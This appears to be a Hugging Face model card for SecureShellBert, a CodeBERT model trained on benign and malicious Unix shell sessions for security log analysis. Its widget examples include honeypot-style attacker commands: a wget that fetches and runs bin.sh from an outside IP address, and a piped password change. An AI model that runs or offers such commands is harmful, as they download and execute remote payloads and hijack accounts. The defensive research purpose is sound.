SecureShellBert / README.md
MrBoffa's picture
Update README.md
a4f1867 verified
|
raw
history blame
1.18 kB
metadata
widget:
  - text: cat /proc/cpuinfo | cat <mask> | wc -l ;
  - text: echo -e pcnv81k7W9cAOnonv81k7W9cAOno | passwd | <mask> ;
  - text: >-
      cat /proc/cpuinfo | grep name | head -n 1 | awk {<mask>
      $4,$5,$6,$7,$8,$9;} ;
  - text: wget http://81.23.76.166/bin.sh ; chmod 777 bin.sh ; sh <mask>.sh ;
pipeline_tag: fill-mask
metrics:
  - perplexity

SecureShellBert is a CodeBert model fine-tuned for Masked Language Modelling.

The model was domain-adapted following the Huggingface guide using a corpus of >20k Unix sessions. Such sessions are both malign (see more at HaaS) and benign (see more at NLP2Bash) sessions.

The model was trained:

  • For 10 epochs
  • mlm probability of 0.15
  • batch size = 16
  • learning rate of 1e-5
  • chunk size = 256

This model was used to finetuned LogPrecis. See more at GitHub for code and data, and please cite our article.